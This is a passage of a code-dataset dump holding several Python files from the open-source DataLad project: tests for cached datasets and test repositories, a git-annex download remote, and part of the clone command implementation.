307, "path": "/datalad/tests/test_utils_cached_dataset.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Testing cached test dataset utils\"\"\"\n\nfrom unittest.mock import patch\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_cached_dataset import (\n cached_dataset,\n cached_url,\n get_cached_dataset,\n url2filename,\n)\nfrom datalad.tests.utils_pytest import (\n DEFAULT_REMOTE,\n assert_equal,\n assert_false,\n assert_in,\n assert_is,\n assert_is_instance,\n assert_not_equal,\n assert_not_in,\n assert_raises,\n assert_result_count,\n assert_true,\n skip_if_no_network,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n ensure_list,\n opj,\n)\n\nCACHE_PATCH_STR = \"datalad.tests.utils_cached_dataset.DATALAD_TESTS_CACHE\"\nCLONE_PATCH_STR = \"datalad.tests.utils_cached_dataset.Clone.__call__\"\n\n\n@skip_if_no_network\n@with_tempfile(mkdir=True)\ndef test_get_cached_dataset(cache_dir=None):\n\n # patch DATALAD_TESTS_CACHE to not use the actual cache with\n # the test testing that very cache.\n cache_dir = Path(cache_dir)\n\n # store file-based values for testrepo-minimalds for readability:\n annexed_file = opj('inannex', 'animated.gif')\n annexed_file_key = \"MD5E-s144625--4c458c62b7ac8ec8e19c8ff14b2e34ad.gif\"\n\n with patch(CACHE_PATCH_STR, new=cache_dir):\n\n # tuples to test (url, version, keys, class):\n test_cases = [\n\n # a simple testrepo\n (\"https://github.com/datalad/testrepo--minimalds\",\n \"541cf855d13c2a338ff2803d4488daf0035e568f\",\n None,\n AnnexRepo),\n # Same repo, but request paths to be present. This should work\n # with a subsequent call, although the first one did not already\n # request any:\n (\"https://github.com/datalad/testrepo--minimalds\",\n \"9dd8b56cc706ab56185f2ceb75fbe9de9b606724\",\n annexed_file_key,\n AnnexRepo),\n # Same repo again, but invalid version\n (\"https://github.com/datalad/testrepo--minimalds\",\n \"nonexistent\",\n \"irrelevantkey\", # invalid version; don't even try to get the key\n AnnexRepo),\n # same thing with different name should be treated as a new thing:\n (\"https://github.com/datalad/testrepo--minimalds\",\n \"git-annex\",\n None,\n AnnexRepo),\n # try a plain git repo to make sure we can deal with that:\n # Note, that we first need a test case w/o a `key` parameter to not\n # blow up the test when Clone is patched, resulting in a MagicMock\n # instead of a Dataset instance within get_cached_dataset. In the\n # second case it's already cached then, so the patched Clone is\n # never executed.\n (\"https://github.com/datalad/datalad.org\",\n None,\n None,\n GitRepo),\n (\"https://github.com/datalad/datalad.org\",\n \"gh-pages\",\n \"ignored-key\", # it's a git repo; don't even try to get a key\n GitRepo),\n\n ]\n for url, version, keys, cls in test_cases:\n target = cache_dir / url2filename(url)\n\n # assuming it doesn't exist yet - patched cache dir!\n in_cache_before = target.exists()\n with patch(CLONE_PATCH_STR) as exec_clone:\n try:\n ds = get_cached_dataset(url, version, keys)\n invalid_version = False\n except AssertionError:\n # should happen only if `version` wasn't found. Implies\n # that the dataset exists in cache (although not returned\n # due to exception)\n assert_true(version)\n assert_false(Dataset(target).repo.commit_exists(version))\n # mark for later assertions (most of them should still hold\n # true)\n invalid_version = True\n\n assert_equal(exec_clone.call_count, 0 if in_cache_before else 1)\n\n # Patch prevents actual execution. Now do it for real. Note, that\n # this might be necessary for content retrieval even if dataset was\n # in cache before.\n try:\n ds = get_cached_dataset(url, version, keys)\n except AssertionError:\n # see previous call\n assert_true(invalid_version)\n\n assert_is_instance(ds, Dataset)\n assert_true(ds.is_installed())\n assert_equal(target, ds.pathobj)\n assert_is_instance(ds.repo, cls)\n\n if keys and not invalid_version and \\\n AnnexRepo.is_valid_repo(ds.path):\n # Note: it's not supposed to get that content if passed\n # `version` wasn't available. get_cached_dataset would then\n # raise before and not download anything only to raise\n # afterwards.\n here = ds.config.get(\"annex.uuid\")\n where = ds.repo.whereis(ensure_list(keys), key=True)\n assert_true(all(here in remotes for remotes in where))\n\n # version check. Note, that all `get_cached_dataset` is supposed to\n # do, is verifying, that specified version exists - NOT check it\n # out\"\n if version and not invalid_version:\n assert_true(ds.repo.commit_exists(version))\n\n # re-execution\n with patch(CLONE_PATCH_STR) as exec_clone:\n try:\n ds2 = get_cached_dataset(url, version, keys)\n except AssertionError:\n assert_true(invalid_version)\n exec_clone.assert_not_called()\n # returns the same Dataset as before:\n assert_is(ds, ds2)\n\n\n@skip_if_no_network\n@with_tempfile(mkdir=True)\ndef test_cached_dataset(cache_dir=None):\n\n # patch DATALAD_TESTS_CACHE to not use the actual cache with\n # the test testing that very cache.\n cache_dir = Path(cache_dir)\n ds_url = \"https://github.com/datalad/testrepo--minimalds\"\n name_in_cache = url2filename(ds_url)\n annexed_file = Path(\"inannex\") / \"animated.gif\"\n\n with patch(CACHE_PATCH_STR, new=cache_dir):\n\n @cached_dataset(url=ds_url)\n def decorated_test1(ds):\n # we get a Dataset instance\n assert_is_instance(ds, Dataset)\n # it's a clone in a temp. location, not within the cache\n assert_not_in(cache_dir, ds.pathobj.parents)\n assert_result_count(ds.siblings(), 1, type=\"sibling\",\n name=DEFAULT_REMOTE,\n url=(cache_dir / name_in_cache).as_posix())\n here = ds.config.get(\"annex.uuid\")\n origin = ds.config.get(f\"remote.{DEFAULT_REMOTE}.annex-uuid\")\n where = ds.repo.whereis(str(annexed_file))\n assert_not_in(here, where)\n assert_not_in(origin, where)\n\n return ds.pathobj, ds.repo.pathobj\n\n @cached_dataset(url=ds_url, paths=str(annexed_file))\n def decorated_test2(ds):\n # we get a Dataset instance\n assert_is_instance(ds, Dataset)\n # it's a clone in a temp. location, not within the cache\n assert_not_in(cache_dir, ds.pathobj.parents)\n assert_result_count(ds.siblings(), 1, type=\"sibling\",\n name=DEFAULT_REMOTE,\n url=(cache_dir / name_in_cache).as_posix())\n here = ds.config.get(\"annex.uuid\")\n origin = ds.config.get(f\"remote.{DEFAULT_REMOTE}.annex-uuid\")\n where = ds.repo.whereis(str(annexed_file))\n assert_in(here, where)\n assert_in(origin, where)\n\n return ds.pathobj, ds.repo.pathobj\n\n @cached_dataset(url=ds_url)\n def decorated_test3(ds):\n # we get a Dataset instance\n assert_is_instance(ds, Dataset)\n # it's a clone in a temp. location, not within the cache\n assert_not_in(cache_dir, ds.pathobj.parents)\n assert_result_count(ds.siblings(), 1, type=\"sibling\",\n name=DEFAULT_REMOTE,\n url=(cache_dir / name_in_cache).as_posix())\n # origin is the same cached dataset, that got this content in\n # decorated_test2 before. Should still be there. But \"here\" we\n # didn't request it\n here = ds.config.get(\"annex.uuid\")\n origin = ds.config.get(f\"remote.{DEFAULT_REMOTE}.annex-uuid\")\n where = ds.repo.whereis(str(annexed_file))\n assert_not_in(here, where)\n assert_in(origin, where)\n\n return ds.pathobj, ds.repo.pathobj\n\n @cached_dataset(url=ds_url,\n version=\"541cf855d13c2a338ff2803d4488daf0035e568f\")\n def decorated_test4(ds):\n # we get a Dataset instance\n assert_is_instance(ds, Dataset)\n # it's a clone in a temp. location, not within the cache\n assert_not_in(cache_dir, ds.pathobj.parents)\n assert_result_count(ds.siblings(), 1, type=\"sibling\",\n name=DEFAULT_REMOTE,\n url=(cache_dir / name_in_cache).as_posix())\n # origin is the same cached dataset, that got this content in\n # decorated_test2 before. Should still be there. But \"here\" we\n # didn't request it\n here = ds.config.get(\"annex.uuid\")\n origin = ds.config.get(f\"remote.{DEFAULT_REMOTE}.annex-uuid\")\n where = ds.repo.whereis(str(annexed_file))\n assert_not_in(here, where)\n assert_in(origin, where)\n\n assert_equal(ds.repo.get_hexsha(),\n \"541cf855d13c2a338ff2803d4488daf0035e568f\")\n\n return ds.pathobj, ds.repo.pathobj\n\n first_dspath, first_repopath = decorated_test1()\n second_dspath, second_repopath = decorated_test2()\n decorated_test3()\n decorated_test4()\n\n # first and second are not the same, only their origin is:\n assert_not_equal(first_dspath, second_dspath)\n assert_not_equal(first_repopath, second_repopath)\n\n\n@skip_if_no_network\n@with_tempfile(mkdir=True)\ndef test_cached_url(cache_dir=None):\n\n # patch DATALAD_TESTS_CACHE to not use the actual cache with\n # the test testing that very cache.\n cache_dir = Path(cache_dir)\n\n ds_url = \"https://github.com/datalad/testrepo--minimalds\"\n name_in_cache = url2filename(ds_url)\n annexed_file = Path(\"inannex\") / \"animated.gif\"\n annexed_file_key = \"MD5E-s144625--4c458c62b7ac8ec8e19c8ff14b2e34ad.gif\"\n\n with patch(CACHE_PATCH_STR, new=cache_dir):\n\n @cached_url(url=ds_url)\n def decorated_test1(url):\n # we expect a file-scheme url to a cached version of `ds_url`\n expect_origin_path = cache_dir / name_in_cache\n assert_equal(expect_origin_path.as_uri(),\n url)\n origin = Dataset(expect_origin_path)\n assert_true(origin.is_installed())\n assert_false(origin.repo.file_has_content(str(annexed_file)))\n\n decorated_test1()\n\n @cached_url(url=ds_url, keys=annexed_file_key)\n def decorated_test2(url):\n # we expect a file-scheme url to a \"different\" cached version of\n # `ds_url`\n expect_origin_path = cache_dir / name_in_cache\n assert_equal(expect_origin_path.as_uri(),\n url)\n origin = Dataset(expect_origin_path)\n assert_true(origin.is_installed())\n assert_true(origin.repo.file_has_content(str(annexed_file)))\n\n decorated_test2()\n\n # disable caching. Note, that in reality DATALAD_TESTS_CACHE is determined\n # on import time of datalad.tests.fixtures based on the config\n # \"datalad.tests.cache\". We patch the result here, not the config itself.\n with patch(CACHE_PATCH_STR, new=None):\n\n @cached_url(url=ds_url)\n def decorated_test3(url):\n # we expect the original url, since caching is disabled\n assert_equal(url, ds_url)\n\n decorated_test3()\n" }, { "alpha_fraction": 0.5584998726844788, "alphanum_fraction": 0.5598472952842712, "avg_line_length": 35.203250885009766, "blob_id": "946a57c1a8ade0a388e2cca3c7f89c6e76e79929", "content_id": "673c7695de2a41ea2ad4a5a0a613c46f9b590556", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4453, "license_type": "permissive", "max_line_length": 79, "num_lines": 123, "path": "/datalad/customremotes/datalad.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Universal custom remote to support anything our downloaders support\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nfrom urllib.parse import urlparse\n\nfrom datalad.downloaders.providers import Providers\nfrom datalad.support.exceptions import (\n CapturedException,\n TargetFileAbsent,\n)\nfrom datalad.utils import unique\n\nfrom datalad.customremotes import RemoteError\nfrom datalad.customremotes.base import AnnexCustomRemote\nfrom datalad.customremotes.main import main as super_main\n\nlgr = logging.getLogger('datalad.customremotes.datalad')\n\n\nclass DataladAnnexCustomRemote(AnnexCustomRemote):\n \"\"\"git-annex special-remote frontend for DataLad's downloader facility\n \"\"\"\n\n SUPPORTED_SCHEMES = ('http', 'https', 's3', 'shub')\n\n def __init__(self, annex, **kwargs):\n super().__init__(annex)\n\n self._providers = Providers.from_config_files()\n\n def transfer_retrieve(self, key, file):\n urls = []\n error_causes = []\n # TODO: priorities etc depending on previous experience or settings\n for url in self.gen_URLS(key):\n urls.append(url)\n try:\n downloaded_path = self._providers.download(\n url, path=file, overwrite=True\n )\n assert(downloaded_path == file)\n return\n except Exception as exc:\n ce = CapturedException(exc)\n debug_msg = f\"Failed to download {url} for key {key}: \" \\\n f\"{ce.format_with_cause()}\"\n self.message(debug_msg)\n error_causes.append(ce.format_with_cause())\n\n error_msg = f\"Failed to download from any of {len(urls)} locations\"\n if error_causes:\n error_msg += f' {unique(error_causes)}'\n raise RemoteError(error_msg)\n\n def checkurl(self, url):\n try:\n status = self._providers.get_status(url)\n props = dict(filename=status.filename, url=url)\n if status.size is not None:\n props['size'] = status.size\n return [props]\n except Exception as exc:\n ce = CapturedException(exc)\n self.message(\"Failed to check url %s: %s\" % (url, ce))\n return False\n\n def checkpresent(self, key):\n resp = None\n for url in self.gen_URLS(key):\n # somewhat duplicate of CHECKURL\n try:\n status = self._providers.get_status(url)\n if status: # TODO: anything specific to check???\n return True\n # TODO: for CHECKPRESENT-FAILURE we somehow need to figure out\n # that we can connect to that server but that specific url is\n # N/A, probably check the connection etc\n except TargetFileAbsent as exc:\n ce = CapturedException(exc)\n self.message(\n \"Target url %s file seems to be missing: %s\" % (url, ce))\n if not resp:\n # if it is already marked as UNKNOWN -- let it stay that\n # way but if not -- we might as well say that we can no\n # longer access it\n return False\n except Exception as exc:\n ce = CapturedException(exc)\n self.message(\n \"Failed to check status of url %s: %s\" % (url, ce))\n if resp is None:\n raise RemoteError(f'Could not determine presence of key {key}')\n else:\n return False\n\n def claimurl(self, url):\n scheme = urlparse(url).scheme\n if scheme in self.SUPPORTED_SCHEMES:\n return True\n else:\n return False\n\n\ndef main():\n \"\"\"cmdline entry point\"\"\"\n super_main(\n cls=DataladAnnexCustomRemote,\n remote_name='datalad',\n description=\\\n \"download content from various URLs (http{,s}, s3, etc) possibly \"\n \"requiring authentication or custom access mechanisms using \"\n \"DataLad's downloaders\",\n )\n" }, { "alpha_fraction": 0.6517948508262634, "alphanum_fraction": 0.654358983039856, "avg_line_length": 31.5, "blob_id": "937361a6ef38b4d4733f833b6ad72b6e0977542a", "content_id": "da2c6917f281745b639e44be97fb864d133134e9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1950, "license_type": "permissive", "max_line_length": 87, "num_lines": 60, "path": "/datalad/tests/test_utils_testrepos.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for test repositories\n\n\"\"\"\nfrom datalad.tests.utils_pytest import (\n assert_repo_status,\n ok_,\n ok_file_under_git,\n skip_if_on_windows,\n swallow_outputs,\n with_tempfile,\n)\nfrom datalad.tests.utils_testrepos import (\n BasicAnnexTestRepo,\n BasicGitTestRepo,\n)\n\n\ndef _test_BasicAnnexTestRepo(repodir):\n trepo = BasicAnnexTestRepo(repodir)\n trepo.create()\n assert_repo_status(trepo.path)\n ok_file_under_git(trepo.path, 'test.dat')\n ok_file_under_git(trepo.path, 'INFO.txt')\n ok_file_under_git(trepo.path, 'test-annex.dat', annexed=True)\n ok_(trepo.repo.file_has_content('test-annex.dat') is False)\n with swallow_outputs():\n trepo.repo.get('test-annex.dat')\n ok_(trepo.repo.file_has_content('test-annex.dat'))\n\n\n# Use of @with_tempfile() apparently is not friendly to test generators yet\n# so generating two tests manually\n# something is wrong with the implicit tempfile generation on windows\n# a bunch of tested assumptions aren't met, and which ones depends on the\n# windows version being tested\n@skip_if_on_windows\ndef test_BasicAnnexTestRepo_random_location_generated():\n _test_BasicAnnexTestRepo(None) # without explicit path -- must be generated\n\n\n@with_tempfile()\ndef test_BasicAnnexTestRepo(path=None):\n _test_BasicAnnexTestRepo(path)\n\n\n@with_tempfile()\ndef test_BasicGitTestRepo(path=None):\n trepo = BasicGitTestRepo(path)\n trepo.create()\n assert_repo_status(trepo.path, annex=False)\n ok_file_under_git(trepo.path, 'test.dat')\n ok_file_under_git(trepo.path, 'INFO.txt')\n" }, { "alpha_fraction": 0.6034973859786987, "alphanum_fraction": 0.6060706973075867, "avg_line_length": 38.54157638549805, "blob_id": "93504a3f9991a37256703fc82bed472713448aee", "content_id": "52e1ad2d72bbb97496938f718f4727edc2f810d1", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 36141, "license_type": "permissive", "max_line_length": 117, "num_lines": 914, "path": "/datalad/core/distributed/clone.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Plumbing command for dataset installation\"\"\"\n\n\nimport logging\nfrom argparse import REMAINDER\nfrom typing import Dict\n\nfrom datalad.cmd import CommandError\nfrom datalad.config import ConfigManager\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n resolve_path,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results\n)\nfrom datalad.interface.common_opts import (\n location_description,\n reckless_opt,\n)\nfrom datalad.interface.results import get_status_dict\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.constraints import (\n EnsureKeyChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.support.network import (\n RI,\n PathRI,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.utils import (\n knows_annex,\n PurePath,\n rmtree,\n)\n\nfrom .clone_utils import ( # needed because other code imports it from here\n _check_autoenable_special_remotes,\n _format_clone_errors,\n _generate_candidate_clone_sources,\n _get_remote,\n _get_tracking_source,\n _map_urls,\n _test_existing_clone_target,\n _try_clone_candidates,\n decode_source_spec,\n # RIA imports needed b/c datalad-next imports it from here ATM;\n # Remove after core was released and next dropped the ria patch.\n postclone_preannex_cfg_ria,\n postclonecfg_ria,\n)\n\n__docformat__ = 'restructuredtext'\n\nlgr = logging.getLogger('datalad.core.distributed.clone')\n\n\n@build_doc\nclass Clone(Interface):\n \"\"\"Obtain a dataset (copy) from a URL or local directory\n\n The purpose of this command is to obtain a new clone (copy) of a dataset\n and place it into a not-yet-existing or empty directory. As such `clone`\n provides a strict subset of the functionality offered by `install`. Only a\n single dataset can be obtained, and immediate recursive installation of\n subdatasets is not supported. However, once a (super)dataset is installed\n via `clone`, any content, including subdatasets can be obtained by a\n subsequent `get` command.\n\n Primary differences over a direct `git clone` call are 1) the automatic\n initialization of a dataset annex (pure Git repositories are equally\n supported); 2) automatic registration of the newly obtained dataset as a\n subdataset (submodule), if a parent dataset is specified; 3) support\n for additional resource identifiers (DataLad resource identifiers as used\n on datasets.datalad.org, and RIA store URLs as used for store.datalad.org\n - optionally in specific versions as identified by a branch or a tag; see\n examples); and 4) automatic configurable generation of alternative access\n URL for common cases (such as appending '.git' to the URL in case the\n accessing the base URL failed).\n\n In case the clone is registered as a subdataset, the original URL passed to\n `clone` is recorded in `.gitmodules` of the parent dataset in addition\n to the resolved URL used internally for git-clone. This allows to preserve\n datalad specific URLs like ria+ssh://... for subsequent calls to `get` if\n the subdataset was locally removed later on.\n\n || PYTHON >>By default, the command returns a single Dataset instance for\n an installed dataset, regardless of whether it was newly installed ('ok'\n result), or found already installed from the specified source ('notneeded'\n result).<< PYTHON ||\n\n URL mapping configuration\n\n 'clone' supports the transformation of URLs via (multi-part) substitution\n specifications. A substitution specification is defined as a configuration\n setting 'datalad.clone.url-substition.<seriesID>' with a string containing\n a match and substitution expression, each following Python's regular\n expression syntax. Both expressions are concatenated to a single string\n with an arbitrary delimiter character. The delimiter is defined by\n prefixing the string with the delimiter. Prefix and delimiter are stripped\n from the expressions (Example: \",^http://(.*)$,https://\\\\1\"). This setting\n can be defined multiple times, using the same '<seriesID>'. Substitutions\n in a series will be applied incrementally, in order of their definition.\n The first substitution in such a series must match, otherwise no further\n substitutions in a series will be considered. However, following the first\n match all further substitutions in a series are processed, regardless\n whether intermediate expressions match or not. Substitution series themselves\n have no particular order, each matching series will result in a candidate\n clone URL. Consequently, the initial match specification in a series should\n be as precise as possible to prevent inflation of candidate URLs.\n\n .. seealso::\n\n :ref:`handbook:3-001`\n More information on Remote Indexed Archive (RIA) stores\n \"\"\"\n # by default ignore everything but install results\n # i.e. no \"add to super dataset\"\n result_filter = EnsureKeyChoice('action', ('install',))\n # very frequently this command will yield exactly one installed dataset\n # spare people the pain of going through a list by default\n return_type = 'item-or-list'\n # as discussed in #1409 and #1470, we want to return dataset instances\n # matching what is actually available after command completion (and\n # None for any failed dataset installation)\n result_xfm = 'successdatasets-or-none'\n\n _examples_ = [\n dict(text=\"Install a dataset from GitHub into the current directory\",\n code_py=\"clone(\"\n \"source='https://github.com/datalad-datasets/longnow\"\n \"-podcasts.git')\",\n code_cmd=\"datalad clone \"\n \"https://github.com/datalad-datasets/longnow-podcasts.git\"),\n dict(text=\"Install a dataset into a specific directory\",\n code_py=\"\"\"\\\n clone(source='https://github.com/datalad-datasets/longnow-podcasts.git',\n path='myfavpodcasts')\"\"\",\n code_cmd=\"\"\"\\\n datalad clone https://github.com/datalad-datasets/longnow-podcasts.git \\\\\n myfavpodcasts\"\"\"),\n dict(text=\"Install a dataset as a subdataset into the current dataset\",\n code_py=\"\"\"\\\n clone(dataset='.',\n source='https://github.com/datalad-datasets/longnow-podcasts.git')\"\"\",\n code_cmd=\"datalad clone -d . \"\n \"https://github.com/datalad-datasets/longnow-podcasts.git\"),\n dict(text=\"Install the main superdataset from datasets.datalad.org\",\n code_py=\"clone(source='///')\",\n code_cmd=\"datalad clone ///\"),\n dict(text=\"Install a dataset identified by a literal alias from store.datalad.org\",\n code_py=\"clone(source='ria+http://store.datalad.org#~hcp-openaccess')\",\n code_cmd=\"datalad clone ria+http://store.datalad.org#~hcp-openaccess\"),\n dict(\n text=\"Install a dataset in a specific version as identified by a \"\n \"branch or tag name from store.datalad.org\",\n code_py=\"clone(source='ria+http://store.datalad.org#76b6ca66-36b1-11ea-a2e6-f0d5bf7b5561@myidentifier')\",\n code_cmd=\"datalad clone ria+http://store.datalad.org#76b6ca66-36b1-11ea-a2e6-f0d5bf7b5561@myidentifier\"),\n dict(\n text=\"Install a dataset with group-write access permissions\",\n code_py=\\\n \"clone(source='http://example.com/dataset', reckless='shared-group')\",\n code_cmd=\\\n \"datalad clone http://example.com/dataset --reckless shared-group\"),\n ]\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"(parent) dataset to clone into. If given, the newly cloned\n dataset is registered as a subdataset of the parent. Also, if given,\n relative paths are interpreted as being relative to the parent\n dataset, and not relative to the working directory.\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n source=Parameter(\n args=(\"source\",),\n metavar='SOURCE',\n doc=\"\"\"URL, DataLad resource identifier, local path or instance of\n dataset to be cloned\"\"\",\n constraints=EnsureStr()),\n path=Parameter(\n args=(\"path\",),\n metavar='PATH',\n nargs=\"?\",\n doc=\"\"\"path to clone into. If no `path` is provided a\n destination path will be derived from a source URL\n similar to :command:`git clone`\"\"\"),\n git_clone_opts=Parameter(\n args=(\"git_clone_opts\",),\n metavar='GIT CLONE OPTIONS',\n nargs=REMAINDER,\n doc=\"\"\"[PY: A list of command line arguments PY][CMD: Options CMD]\n to pass to :command:`git clone`. [CMD: Any argument specified after\n SOURCE and the optional PATH will be passed to git-clone. CMD] Note\n that not all options will lead to viable results. For example\n '--single-branch' will not result in a functional annex repository\n because both a regular branch and the git-annex branch are\n required. Note that a version in a RIA URL takes precedence over\n '--branch'.\"\"\"),\n description=location_description,\n reckless=reckless_opt,\n )\n\n @staticmethod\n @datasetmethod(name='clone')\n @eval_results\n def __call__(\n source,\n path=None,\n git_clone_opts=None,\n *,\n dataset=None,\n description=None,\n reckless=None,\n ):\n # did we explicitly get a dataset to install into?\n # if we got a dataset, path will be resolved against it.\n # Otherwise path will be resolved first.\n ds = require_dataset(\n dataset, check_installed=True, purpose='clone') \\\n if dataset is not None else dataset\n refds_path = ds.path if ds else None\n\n # legacy compatibility\n if reckless is True:\n # so that we can forget about how things used to be\n reckless = 'auto'\n\n if isinstance(source, Dataset):\n source = source.path\n\n if source == path:\n # even if they turn out to be identical after resolving symlinks\n # and more sophisticated witchcraft, it would still happily say\n # \"it appears to be already installed\", so we just catch an\n # obviously pointless input combination\n raise ValueError(\n \"clone `source` and destination `path` are identical [{}]. \"\n \"If you are trying to add a subdataset simply use `save`\".format(\n path))\n\n if path is not None:\n path = resolve_path(path, dataset)\n\n # derive target from source:\n if path is None:\n # we got nothing but a source. do something similar to git clone\n # and derive the path from the source and continue\n # since this is a relative `path`, resolve it:\n # we are not going to reuse the decoded URL, as this is done for\n # all source candidates in clone_dataset(), we just use to determine\n # a destination path here in order to perform a bunch of additional\n # checks that shall not pollute the helper function\n source_ = decode_source_spec(\n source, cfg=None if ds is None else ds.config)\n path = resolve_path(source_['default_destpath'], dataset)\n lgr.debug(\"Determined clone target path from source\")\n lgr.debug(\"Resolved clone target path to: '%s'\", path)\n\n # there is no other way -- my intoxicated brain tells me\n assert(path is not None)\n\n result_props = dict(\n action='install',\n logger=lgr,\n refds=refds_path,\n source_url=source)\n\n try:\n # this will implicitly cause pathlib to run a bunch of checks\n # whether the present path makes any sense on the platform\n # we are running on -- we don't care if the path actually\n # exists at this point, but we want to abort early if the path\n # spec is determined to be useless\n # we can do strict=False since we are 3.6+\n path.resolve(strict=False)\n except OSError as e:\n ce = CapturedException(e)\n yield get_status_dict(\n status='error',\n path=path,\n message=('cannot handle target path: %s', ce),\n exception=ce,\n **result_props)\n return\n\n destination_dataset = Dataset(path)\n result_props['ds'] = destination_dataset\n\n if ds is not None and ds.pathobj not in path.parents:\n yield get_status_dict(\n status='error',\n message=(\"clone target path '%s' not in specified target dataset '%s'\",\n path, ds),\n **result_props)\n return\n\n # perform the actual cloning operation\n clone_failure = False\n for r in clone_dataset(\n [source],\n destination_dataset,\n reckless,\n description,\n result_props,\n cfg=None if ds is None else ds.config,\n clone_opts=git_clone_opts,\n ):\n if r['status'] in ['error', 'impossible']:\n clone_failure = True\n yield r\n\n if clone_failure:\n # do not proceed saving anything if cloning failed\n return\n\n # TODO handle any 'version' property handling and verification using a\n # dedicated public helper\n\n if ds is not None:\n # we created a dataset in another dataset\n # -> make submodule\n actually_saved_subds = False\n for r in ds.save(\n path,\n # Note, that here we know we don't save anything but a new\n # subdataset. Hence, don't go with default commit message,\n # but be more specific.\n message=\"[DATALAD] Added subdataset\",\n return_type='generator',\n result_filter=None,\n result_xfm=None,\n result_renderer='disabled',\n on_failure='ignore'):\n actually_saved_subds = actually_saved_subds or (\n r['action'] == 'save' and\n r['type'] == 'dataset' and\n r['refds'] == ds.path and\n r['status'] == 'ok')\n yield r\n\n # Modify .gitmodules to contain originally given url. This is\n # particularly relevant for postclone routines on a later `get`\n # for that subdataset. See gh-5256.\n\n if isinstance(RI(source), PathRI):\n # ensure posix paths; Windows paths would neither be meaningful\n # as a committed path nor are they currently stored correctly\n # (see gh-7182).\n # Restricted to when 'source' is identified as a path, b/c this\n # wouldn't work with file-URLs (ria or not):\n #\n # PureWindowsPath(\"file:///C:/somewhere/path\").as_posix() ->\n # 'file:/C:/somewhere/path'\n source = PurePath(source).as_posix()\n if actually_saved_subds:\n # New subdataset actually saved. Amend the modification\n # of .gitmodules.\n # Note, that we didn't allow deviating from git's default\n # behavior WRT a submodule's name vs its path when we made this\n # a new subdataset.\n subds_name = path.relative_to(ds.pathobj)\n ds.repo.call_git(\n ['config',\n '--file',\n '.gitmodules',\n '--replace-all',\n 'submodule.{}.{}'.format(subds_name,\n \"datalad-url\"),\n source]\n )\n yield from ds.save('.gitmodules',\n amend=True, to_git=True,\n result_renderer='disabled',\n return_type='generator')\n else:\n # We didn't really commit. Just call `subdatasets`\n # in that case to have the modification included in the\n # post-clone state (whatever that may be).\n ds.subdatasets(path, set_property=[(\"datalad-url\", source)])\n\n\ndef clone_dataset(\n srcs,\n destds,\n reckless=None,\n description=None,\n result_props=None,\n cfg=None,\n checkout_gitsha=None,\n clone_opts=None):\n \"\"\"Internal helper to perform cloning without sanity checks (assumed done)\n\n This helper does not handle any saving of subdataset modification or adding\n in a superdataset.\n\n Parameters\n ----------\n srcs : list\n Any suitable clone source specifications (paths, URLs)\n destds : Dataset\n Dataset instance for the clone destination\n reckless : {None, 'auto', 'ephemeral', 'shared-...'}, optional\n Mode switch to put cloned dataset into unsafe/throw-away configurations, i.e.\n sacrifice data safety for performance or resource footprint. When None\n and `cfg` is specified, use the value of `datalad.clone.reckless`.\n description : str, optional\n Location description for the annex of the dataset clone (if there is any).\n result_props : dict, optional\n Default properties for any yielded result, passed on to get_status_dict().\n cfg : ConfigManager, optional\n Configuration for parent dataset. This will be queried instead\n of the global DataLad configuration.\n checkout_gitsha : str, optional\n If given, a specific commit, identified by shasum, will be checked out after\n cloning. A dedicated follow-up fetch will be performed, if the initial clone\n did not obtain the commit object. Should the checkout of the target commit\n cause a detached HEAD, the previously active branch will be reset to the\n target commit.\n clone_opts : list of str, optional\n Options passed to git-clone. Note that for RIA URLs, the version is\n translated to a --branch argument, and that will take precedence over a\n --branch argument included in this value.\n\n Yields\n ------\n dict\n DataLad result records\n \"\"\"\n # apply the two in-house patches, do local to avoid circular imports\n from . import (\n clone_ephemeral,\n clone_ria,\n )\n\n if not result_props:\n # in case the caller had no specific idea on how results should look\n # like, provide sensible defaults\n result_props = dict(\n action='install',\n logger=lgr,\n ds=destds,\n )\n else:\n result_props = result_props.copy()\n\n candidate_sources = _generate_candidate_clone_sources(\n destds, srcs, cfg)\n\n # important 